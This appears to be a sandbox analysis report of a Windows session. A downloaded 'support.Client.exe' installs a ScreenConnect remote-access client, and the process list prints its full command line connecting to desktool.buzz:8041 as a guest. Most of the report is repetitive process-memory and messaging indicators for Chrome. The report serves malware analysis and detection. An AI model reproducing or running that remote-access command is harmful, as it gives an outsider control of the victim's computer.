N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4100 wrote to memory of 3316 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3316 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 3340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 4976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 4976 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4100 wrote to memory of 768 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffac9ef9758,0x7ffac9ef9768,0x7ffac9ef9778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://google.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1764 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3148 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4556 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5088 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5108 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3328 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5616 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5536 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5912 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5924 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Users\Admin\Downloads\support.Client.exe

"C:\Users\Admin\Downloads\support.Client.exe"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe" "?y=Guest&h=desktool.buzz&p=8041&s=50ef8fa4-9a64-466f-978c-e78b5206d7cb&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Sam%20Dan" "1"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe" "?y=Guest&h=desktool.buzz&p=8041&s=50ef8fa4-9a64-466f-978c-e78b5206d7cb&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Sam%20Dan" "1"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe" "RunRole" "e39004f1-651e-442d-96fc-edef529bc0a1" "User"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe" "RunRole" "04401fb2-489e-4727-9d0f-f2d867723fb7" "System"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\support.Client.exe

"C:\Users\Admin\Downloads\support.Client.exe"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.WindowsClient.exe"

C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe

"C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe" "?y=Guest&h=desktool.buzz&p=8041&s=50ef8fa4-9a64-466f-978c-e78b5206d7cb&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=Sam%20Dan" "1"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3424 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=3968 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5704 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6200 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=3276 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5776 --field-trial-handle=1840,i,3305380668072969911,1130776868290079762,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

